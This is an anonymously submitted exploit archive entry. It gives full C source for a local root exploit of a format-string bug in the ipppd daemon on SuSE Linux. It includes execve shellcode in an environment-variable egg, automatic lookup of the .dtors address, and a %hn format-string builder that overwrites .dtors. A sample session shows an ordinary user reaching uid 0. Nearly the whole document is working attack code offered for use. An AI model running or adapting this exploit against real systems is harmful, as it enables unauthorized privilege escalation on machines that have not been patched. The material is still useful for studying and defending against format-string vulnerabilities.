Another exploit for ipppd, the daemon that is part of the isdn4linux-utils package and is part of the default install for many linux distributions. Tested on SuSE 7.3 and should work on SuSE 8.0. Anonymously submitted.
5010025186a5b9e7bdc4e46a0ff7cd95eee0761951c2b034cc7db0f606d8cd82
/*
*This is a lame exploit(i have only rewrite the fmtbuilder.c , with some features) for the formatstring bug in ipppd,*
*i have test this exploit under SuSE 7.3, but i'm sure it works under SuSE 8.0 too.
*
*This exploit detects automaticly the .dtors addr. and shelladdr.
*you only have to start the eggshell
* ./exploitipppd -s
*then
* -/exploitipppd -e
*----------------------------------------------------------------------------------------------------------------------
study@delikon:~/security/fmt> id
uid=502(study) gid=100(users) Gruppen=100(users),14(uucp),16(dialout),17(audio),33(video)
study@delikon:~/security/fmt> ./exploitipppd -s
Use ./exploitipppd -e to explore ipppd now
sh-2.05$ ./exploitipppd -e
You used .dtors=806c1c4 , Shellcodeaddr.=bffffb35 , offset=11 ,base=5
Please type id, and check if you are r00t ;=)
If you are not, type ./exploitipppd -h and try different offsets and check file pathes in the header
sh-2.05# id
uid=0(root) gid=100(users) groups=100(users),14(uucp),16(dialout),17(audio),33(video)
sh-2.05#
------------------------------------------------------------------------------------------------------------------------
tail -f /vat/log/messages
give this output
Nov 7 15:20:56 delikon ipppd: Exit.
------------------------------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define ADD 0x100
#define OCT( b0, b1, b2, b3, addr ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
}
#define DTORS "/usr/bin/objdump -s -j .dtors /usr/sbin/ipppd | /usr/bin/cut -c 2-9 |/usr/bin/awk NR==5"
#define IPPPD "/usr/sbin/ipppd"
#define OFFSET 11
#define BASE 5
#define DEF_EGGSIZE 500
#define DEF_ALIGN 4
char vitamin[300];
char DtorsAddr[36];
unsigned long get_sp(void)
{ __asm__ ("movl %esp, %eax");
}
char nop[] = { 0x90 };
static char shellcode[] = //ptrace24.c shellcode
"\x6a\x17\x58\x31\xdb\xcd\x80\x31"
"\xd2\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x8d\x42\x0b\xcd\x80";
int i=0;
char *pointer;
char *nops = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
int find(){
/*Thanks to GOBBLES for the find() code*/
pointer = (char *)get_sp();
while((i = strncmp(pointer, nops, strlen(nops))) != 0)
pointer++;
if(i == 0) {
pointer=pointer+1;
return pointer;
}
else {
fprintf(stderr, "Sorry nimm GDB\n");
return;
}
}
char *
grepit()
{
//from the Mixter md5bd.c backdoor
FILE *p;
char fmt[1024];
snprintf(fmt, 1024, DTORS);
p = popen(fmt, "r");
memset(DtorsAddr, 0, 36);
fread(DtorsAddr, 32, 1, p);
fclose(p);
return DtorsAddr;
}
char *
build_hn( unsigned int retaddr, unsigned int offset, unsigned int base )
{
// From the fmtbuilder.c
unsigned int length;
unsigned int high, low;
char * buf;
int start = ((base / (ADD*ADD)) + 1)*ADD*ADD;
high = ( retaddr & 0xffff0000 ) >> 16;
low = retaddr & 0x0000ffff;
length = ( sizeof( offset ) * 2 ) + sizeof( high ) + sizeof( low ) + 15;
if ( !(buf = (char *)malloc(length * sizeof(char))) ) {
fprintf( stderr, "Can't allocate buffer (%d)\n", length );
exit( -1 );
}
memset( buf, 0, length );
snprintf( buf, length,
"%%.%hdx%%%d$n%%.%hdx%%%d$hn",
low - ( sizeof( size_t ) * 2 ) + start - base,
offset,
high - low + start,
offset+1 );
return buf;
}
void soso(void)
{
printf ( "\t\t***yet another lame ipppd local root formatstring exploit***\n\n");
printf ( "**usage:\n\n exploitipppd -s start the eggshell -e !ExploRe iT! [-d .dtors section -o offset -b base]\n\n");
}
void egg()
{
char *eggbuf, *buf_ptr;
int align, i, eggsize ;
align = DEF_ALIGN;
eggsize = DEF_EGGSIZE ;
if ( (eggbuf = malloc( eggsize )) == NULL ) {
printf ("error : malloc \n");
exit (-1);
}
/* set egg buf */
memset( eggbuf, (int)NULL , eggsize );
for ( i = 0; i < 250 ; i++ )
strcat ( eggbuf, nop );
strcat ( eggbuf, shellcode );
for ( i =0 ; i < align ; i++ )
strcat ( eggbuf, "A");
memcpy ( eggbuf, "S=", 2 );
putenv ( eggbuf );
fprintf(stderr, "\nUse ./exploitipppd -e to explore ipppd now\n\n");
system("/bin/sh");
}
int
main( int argc, char **argv[] )
{
char opt;
char * fmt;
char * endian;
unsigned long locaddr, retaddr;
unsigned int offset, base, align = 0;
unsigned char b0, b1, b2, b3;
int length, ch;
int t=0, u=0;
if(argc < 2)
{
soso();
exit(1);
}
length = ( sizeof( size_t ) * 16 ) + 1;
if ( !(endian = (char *)malloc(length * sizeof(char))) ) {
fprintf( stderr, "Can't allocate buffer (%d)\n", length );
exit( -1 );
}
memset( endian, 0, length );
offset = OFFSET;
base = BASE;//the distance from the beginning of the string to the exploration string, here you have a /dev/ at the begining
grepit();
locaddr = strtoul( DtorsAddr, NULL, 16);
locaddr +=4;
while((opt = getopt(argc, argv, "sed:o:b:h")) != EOF) {
switch(opt) {
case 's':
egg();
fprintf(stderr, "\nUse %s -e to explore ipppd now\n\n",argv[0]);
exit(0);
case 'e':
break;
case 'd':
locaddr = strtoul( optarg, NULL, 16);
locaddr += 4;
break;
case 'o':
offset = atoi(optarg);
break;
case 'b':
base = atoi(optarg);
break;
case 'h':
soso();
exit(0);
break;
}}
u = find();
retaddr = u;
OCT( b0, b1, b2, b3, locaddr );
if ( base%4 ) {
align = 4 - ( base%4 );
base += align;
}
memset(vitamin, '\0', sizeof(vitamin));
snprintf( endian, length,
"%c%c%c%c"
"%c%c%c%c",
b3, b2, b1, b0,
b3 + 2, b2, b1, b0 );
fmt = build_hn( retaddr, offset, base );
for( ; align>0; --align)
{
strcat(vitamin,"X");
}
strcat(vitamin,endian);
strcat(vitamin, fmt );
for( t=0;t<=260;t++)
strcat(vitamin,"x");
fprintf(stderr, "\nYou used .dtors=%x , Shellcodeaddr.=%x , offset=%d ,base=%d \n\n", (locaddr-4), retaddr, offset,base-3);
fprintf(stderr, "\nPlease type id, and check if you are r00t ;=)\n\n");
fprintf(stderr, "\nIf you are not, type %s -h and try different offsets and check file pathes in the header \n\n",argv[0]);
execl(IPPPD, "ipppd", vitamin, NULL);
}